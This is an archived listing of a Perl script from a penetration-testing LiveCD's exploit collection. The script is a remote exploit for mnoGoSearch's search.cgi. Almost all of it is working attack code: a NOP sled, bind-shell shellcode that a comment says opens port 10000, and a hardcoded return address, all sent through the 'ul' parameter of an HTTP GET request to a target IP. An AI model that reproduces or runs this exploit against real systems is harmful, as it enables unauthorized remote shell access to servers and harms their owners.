home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / mngosearch / DSR-mnogo.pl < prev    next >
Text File  |  2005-02-12  |  923b  |  38 lines
  1. # shellcode binds shell to port 10000
  2.  
  3. use IO::Socket;
  4.  
  5. unless (@ARGV > 0) { die "Usage ./DSR-mnogo IP"}
  6.  
  7. $host = shift(@ARGV);
  8. $ret = pack("l",0xbfbff670);
  9. $nop = "\x90"x5402;
  10.  
  11. $shellcode = 
  12. "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";
  13.  
  14.  
  15. $exploit_string = $nop.$shellcode.$ret.$ret;
  16.  
  17.  
  18. print "\nRemote Mnogo Exploit \n";
  19. print "Code by inv \n\n";
  20. print "Host: $host\n";
  21.  
  22. $remote = IO::Socket::INET->new(
  23.  
  24.     Proto         =>    "tcp",
  25.     PeerAddr    =>    $host,
  26.     PeerPort    =>    "http(80)",
  27.     );
  28.  
  29. $remote->autoflush(1);
  30.  
  31. print $remote "GET /cgi-bin/search.cgi?ul=$exploit_string HTTP/1.0\n\n";
  32.  
  33. while ( <$remote> ) { print }
  34.  
  35. close $remote;
  36.  
  37.  
  38.